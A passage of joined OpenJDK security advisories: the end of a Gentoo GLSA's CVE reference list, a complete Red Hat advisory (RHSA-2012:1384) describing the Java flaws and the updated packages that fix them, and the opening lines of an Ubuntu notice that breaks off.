CVE-2013-1571 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1571 [ 98 ] CVE-2013-2383 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2383 [ 99 ] CVE-2013-2384 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2384 [ 100 ] CVE-2013-2394 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2394 [ 101 ] CVE-2013-2400 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2400 [ 102 ] CVE-2013-2407 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2407 [ 103 ] CVE-2013-2412 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2412 [ 104 ] CVE-2013-2414 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2414 [ 105 ] CVE-2013-2415 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2415 [ 106 ] CVE-2013-2416 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2416 [ 107 ] CVE-2013-2417 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2417 [ 108 ] CVE-2013-2418 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2418 [ 109 ] CVE-2013-2419 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2419 [ 110 ] CVE-2013-2420 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2420 [ 111 ] CVE-2013-2421 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2421 [ 112 ] CVE-2013-2422 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2422 [ 113 ] CVE-2013-2423 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2423 [ 114 ] CVE-2013-2424 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2424 [ 115 ] CVE-2013-2425 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2425 [ 116 ] CVE-2013-2426 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2426 [ 117 ] CVE-2013-2427 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2427 [ 118 ] CVE-2013-2428 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2428 [ 119 ] CVE-2013-2429 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2429 [ 120 ] CVE-2013-2430 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2430 [ 121 ] CVE-2013-2431 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2431 [ 122 ] CVE-2013-2432 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2432 [ 123 ] CVE-2013-2433 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2433 [ 124 ] CVE-2013-2434 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2434 [ 125 ] CVE-2013-2435 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2435 [ 126 ] CVE-2013-2436 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2436 [ 127 ] CVE-2013-2437 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2437 [ 128 ] CVE-2013-2438 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2438 [ 129 ] CVE-2013-2439 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2439 [ 130 ] CVE-2013-2440 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2440 [ 131 ] CVE-2013-2442 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2442 [ 132 ] CVE-2013-2443 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2443 [ 133 ] CVE-2013-2444 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2444 [ 134 ] CVE-2013-2445 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2445 [ 135 ] CVE-2013-2446 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2446 [ 136 ] CVE-2013-2447 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2447 [ 137 ] CVE-2013-2448 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2448 [ 138 ] CVE-2013-2449 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2449 [ 139 ] CVE-2013-2450 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2450 [ 140 ] CVE-2013-2451 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2451 [ 141 ] CVE-2013-2452 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2452 [ 142 ] CVE-2013-2453 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2453 [ 143 ] CVE-2013-2454 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2454 [ 144 ] CVE-2013-2455 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2455 [ 145 ] CVE-2013-2456 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2456 [ 146 ] CVE-2013-2457 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2457 [ 147 ] CVE-2013-2458 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2458 [ 148 ] CVE-2013-2459 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2459 [ 149 ] CVE-2013-2460 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2460 [ 150 ] CVE-2013-2461 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2461 [ 151 ] CVE-2013-2462 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2462 [ 152 ] CVE-2013-2463 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2463 [ 153 ] CVE-2013-2464 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2464 [ 154 ] CVE-2013-2465 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2465 [ 155 ] CVE-2013-2466 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2466 [ 156 ] CVE-2013-2467 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2467 [ 157 ] CVE-2013-2468 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2468 [ 158 ] CVE-2013-2469 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2469 [ 159 ] CVE-2013-2470 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2470 [ 160 ] CVE-2013-2471 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2471 [ 161 ] CVE-2013-2472 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2472 [ 162 ] CVE-2013-2473 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2473 [ 163 ] CVE-2013-3743 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3743 [ 164 ] CVE-2013-3744 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3744 [ 165 ] CVE-2013-3829 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3829 [ 166 ] CVE-2013-5772 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5772 [ 167 ] CVE-2013-5774 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5774 [ 168 ] CVE-2013-5775 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5775 [ 169 ] CVE-2013-5776 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5776 [ 170 ] CVE-2013-5777 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5777 [ 171 ] CVE-2013-5778 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5778 [ 172 ] CVE-2013-5780 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5780 [ 173 ] CVE-2013-5782 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5782 [ 174 ] CVE-2013-5783 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5783 [ 175 ] CVE-2013-5784 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5784 [ 176 ] CVE-2013-5787 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5787 [ 177 ] CVE-2013-5788 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5788 [ 178 ] CVE-2013-5789 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5789 [ 179 ] CVE-2013-5790 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5790 [ 180 ] CVE-2013-5797 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5797 [ 181 ] CVE-2013-5800 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5800 [ 182 ] CVE-2013-5801 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5801 [ 183 ] CVE-2013-5802 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5802 [ 184 ] CVE-2013-5803 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5803 [ 185 ] CVE-2013-5804 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5804 [ 186 ] CVE-2013-5805 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5805 [ 187 ] CVE-2013-5806 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5806 [ 188 ] CVE-2013-5809 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5809 [ 189 ] CVE-2013-5810 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5810 [ 190 ] CVE-2013-5812 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5812 [ 191 ] CVE-2013-5814 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5814 [ 192 ] CVE-2013-5817 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5817 [ 193 ] CVE-2013-5818 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5818 [ 194 ] CVE-2013-5819 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5819 [ 195 ] CVE-2013-5820 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5820 [ 196 ] CVE-2013-5823 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5823 [ 197 ] CVE-2013-5824 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5824 [ 198 ] CVE-2013-5825 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5825 [ 199 ] CVE-2013-5829 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5829 [ 200 ] CVE-2013-5830 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5830 [ 201 ] CVE-2013-5831 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5831 [ 202 ] CVE-2013-5832 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5832 [ 203 ] CVE-2013-5838 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5838 [ 204 ] CVE-2013-5840 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5840 [ 205 ] CVE-2013-5842 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5842 [ 206 ] CVE-2013-5843 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5843 [ 207 ] CVE-2013-5844 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5844 [ 208 ] CVE-2013-5846 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5846 [ 209 ] CVE-2013-5848 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5848 [ 210 ] CVE-2013-5849 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5849 [ 211 ] CVE-2013-5850 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5850 [ 212 ] CVE-2013-5851 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5851 [ 213 ] CVE-2013-5852 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5852 [ 214 ] CVE-2013-5854 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5854 [ 215 ] CVE-2013-5870 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5870 [ 216 ] CVE-2013-5878 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5878 [ 217 ] CVE-2013-5887 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5887 [ 218 ] CVE-2013-5888 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5888 [ 219 ] CVE-2013-5889 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5889 [ 220 ] CVE-2013-5893 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5893 [ 221 ] CVE-2013-5895 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5895 [ 222 ] CVE-2013-5896 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5896 [ 223 ] CVE-2013-5898 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5898 [ 224 ] CVE-2013-5899 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5899 [ 225 ] CVE-2013-5902 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5902 [ 226 ] CVE-2013-5904 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5904 [ 227 ] CVE-2013-5905 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5905 [ 228 ] CVE-2013-5906 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5906 [ 229 ] CVE-2013-5907 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5907 [ 230 ] CVE-2013-5910 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5910 [ 231 ] CVE-2014-0368 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0368 [ 232 ] CVE-2014-0373 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0373 [ 233 ] CVE-2014-0375 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0375 [ 234 ] CVE-2014-0376 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0376 [ 235 ] CVE-2014-0382 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0382 [ 236 ] CVE-2014-0385 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0385 [ 237 ] CVE-2014-0387 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0387 [ 238 ] CVE-2014-0403 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0403 [ 239 ] CVE-2014-0408 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0408 [ 240 ] CVE-2014-0410 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0410 [ 241 ] CVE-2014-0411 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0411 [ 242 ] CVE-2014-0415 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0415 [ 243 ] CVE-2014-0416 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0416 [ 244 ] CVE-2014-0417 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0417 [ 245 ] CVE-2014-0418 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0418 [ 246 ] CVE-2014-0422 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0422 [ 247 ] CVE-2014-0423 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0423 [ 248 ] CVE-2014-0424 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0424 [ 249 ] CVE-2014-0428 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0428
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201401-30.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Critical: java-1.6.0-openjdk security update Advisory ID: RHSA-2012:1384-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2012-1384.html Issue date: 2012-10-17 CVE Names: CVE-2012-3216 CVE-2012-4416 CVE-2012-5068 CVE-2012-5069 CVE-2012-5071 CVE-2012-5072 CVE-2012-5073 CVE-2012-5075 CVE-2012-5077 CVE-2012-5079 CVE-2012-5081 CVE-2012-5084 CVE-2012-5085 CVE-2012-5086 CVE-2012-5089 =====================================================================
- Summary:
Updated java-1.6.0-openjdk packages that fix several security issues are now available for Red Hat Enterprise Linux 6.
The Red Hat Security Response Team has rated this update as having critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
- Description:
These packages provide the OpenJDK 6 Java Runtime Environment and the OpenJDK 6 Software Development Kit.
Multiple improper permission check issues were discovered in the Beans, Swing, and JMX components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions. (CVE-2012-5086, CVE-2012-5084, CVE-2012-5089)
Multiple improper permission check issues were discovered in the Scripting, JMX, Concurrency, Libraries, and Security components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions. (CVE-2012-5068, CVE-2012-5071, CVE-2012-5069, CVE-2012-5073, CVE-2012-5072)
It was discovered that java.util.ServiceLoader could create an instance of an incompatible class while performing provider lookup. An untrusted Java application or applet could use this flaw to bypass certain Java sandbox restrictions. (CVE-2012-5079)
It was discovered that the Java Secure Socket Extension (JSSE) SSL/TLS implementation did not properly handle handshake records containing an overly large data length value. An unauthenticated, remote attacker could possibly use this flaw to cause an SSL/TLS server to terminate with an exception. (CVE-2012-5081)
It was discovered that the JMX component in OpenJDK could perform certain actions in an insecure manner. An untrusted Java application or applet could possibly use this flaw to disclose sensitive information. (CVE-2012-5075)
A bug in the Java HotSpot Virtual Machine optimization code could cause it to not perform array initialization in certain cases. An untrusted Java application or applet could use this flaw to disclose portions of the virtual machine's memory. (CVE-2012-4416)
It was discovered that the SecureRandom class did not properly protect against the creation of multiple seeders. An untrusted Java application or applet could possibly use this flaw to disclose sensitive information. (CVE-2012-5077)
It was discovered that the java.io.FilePermission class exposed the hash code of the canonicalized path name. An untrusted Java application or applet could possibly use this flaw to determine certain system paths, such as the current working directory. (CVE-2012-3216)
This update disables Gopher protocol support in the java.net package by default. Gopher support can be enabled by setting the newly introduced property, "jdk.net.registerGopherProtocol", to true. (CVE-2012-5085)
Note: If the web browser plug-in provided by the icedtea-web package was installed, the issues exposed via Java applets could have been exploited without user interaction if a user visited a malicious website.
This erratum also upgrades the OpenJDK package to IcedTea6 1.11.5. Refer to the NEWS file, linked to in the References, for further information.
All users of java-1.6.0-openjdk are advised to upgrade to these updated packages, which resolve these issues. All running instances of OpenJDK Java must be restarted for the update to take effect.
- Solution:
Before applying this update, make sure all previously-released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/knowledge/articles/11258
- Bugs fixed (http://bugzilla.redhat.com/):
856124 - CVE-2012-4416 OpenJDK: uninitialized Array JVM memory disclosure (Hotspot, 7198606) 865346 - CVE-2012-3216 OpenJDK: java.io.FilePermission information leak (Libraries, 6631398) 865348 - CVE-2012-5068 OpenJDK: RhinoScriptEngine security bypass (Scripting, 7143535) 865354 - CVE-2012-5077 OpenJDK: SecureRandom mulitple seeders information disclosure (Security, 7167656) 865357 - CVE-2012-5073 OpenJDK: LogManager security bypass (Libraries, 7169884) 865363 - CVE-2012-5075 OpenJDK: RMIConnectionImpl information disclosure (JMX, 7169888) 865365 - CVE-2012-5072 OpenJDK: AccessController.doPrivilegedWithCombiner() information disclosure (Security, 7172522) 865370 - CVE-2012-5081 OpenJDK: JSSE denial of service (JSSE, 7186286) 865428 - CVE-2012-5086 OpenJDK: XMLDecoder sandbox restriction bypass (Beans, 7195917) 865511 - CVE-2012-5084 OpenJDK: DefaultFormatter insufficient data validation (Swing, 7195194) 865514 - CVE-2012-5089 OpenJDK: RMIConnectionImpl insufficient access control checks (JMX, 7198296) 865519 - CVE-2012-5071 OpenJDK: DescriptorSupport insufficient package access checks (JMX, 7192975) 865531 - CVE-2012-5069 OpenJDK: Executors state handling issues (Concurrency, 7189103) 865541 - CVE-2012-5085 OpenJDK: disable Gopher support by default (Gopher, 7189567) 865568 - CVE-2012-5079 OpenJDK: ServiceLoader reject not subtype classes without instantiating (Libraries, 7195919)
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.50.1.11.5.el6_3.src.rpm
i386: java-1.6.0-openjdk-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm
x86_64: java-1.6.0-openjdk-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.50.1.11.5.el6_3.src.rpm
i386: java-1.6.0-openjdk-debuginfo-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm java-1.6.0-openjdk-src-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm
x86_64: java-1.6.0-openjdk-debuginfo-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.50.1.11.5.el6_3.src.rpm
x86_64: java-1.6.0-openjdk-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.50.1.11.5.el6_3.src.rpm
x86_64: java-1.6.0-openjdk-debuginfo-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.50.1.11.5.el6_3.src.rpm
i386: java-1.6.0-openjdk-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm
x86_64: java-1.6.0-openjdk-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.50.1.11.5.el6_3.src.rpm
i386: java-1.6.0-openjdk-debuginfo-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm java-1.6.0-openjdk-src-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm
x86_64: java-1.6.0-openjdk-debuginfo-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.50.1.11.5.el6_3.src.rpm
i386: java-1.6.0-openjdk-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm
x86_64: java-1.6.0-openjdk-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.50.1.11.5.el6_3.src.rpm
i386: java-1.6.0-openjdk-debuginfo-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm java-1.6.0-openjdk-src-1.6.0.0-1.50.1.11.5.el6_3.i686.rpm
x86_64: java-1.6.0-openjdk-debuginfo-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.0-1.50.1.11.5.el6_3.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- References:
https://www.redhat.com/security/data/cve/CVE-2012-3216.html https://www.redhat.com/security/data/cve/CVE-2012-4416.html https://www.redhat.com/security/data/cve/CVE-2012-5068.html https://www.redhat.com/security/data/cve/CVE-2012-5069.html https://www.redhat.com/security/data/cve/CVE-2012-5071.html https://www.redhat.com/security/data/cve/CVE-2012-5072.html https://www.redhat.com/security/data/cve/CVE-2012-5073.html https://www.redhat.com/security/data/cve/CVE-2012-5075.html https://www.redhat.com/security/data/cve/CVE-2012-5077.html https://www.redhat.com/security/data/cve/CVE-2012-5079.html https://www.redhat.com/security/data/cve/CVE-2012-5081.html https://www.redhat.com/security/data/cve/CVE-2012-5084.html https://www.redhat.com/security/data/cve/CVE-2012-5085.html https://www.redhat.com/security/data/cve/CVE-2012-5086.html https://www.redhat.com/security/data/cve/CVE-2012-5089.html https://access.redhat.com/security/updates/classification/#critical http://icedtea.classpath.org/hg/release/icedtea6-1.11/file/icedtea6-1.11.5/NEWS http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2012 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFQftnqXlSAg2UNWIIRAjiMAJ9fURghELdTR+Cc8Y57xJQNW0E6RACfaKRO sA1k2caLD2R40zVc9Rc7HIY= =1eL6 -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . ============================================================================ Ubuntu Security Notice USN-1619-1 October 26, 2012
openjdk-6, openjdk-7 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.10
- Ubuntu 12.04 LTS
- Ubuntu 11.10
- Ubuntu 11.04
- Ubuntu 10.04 LTS
Summary:
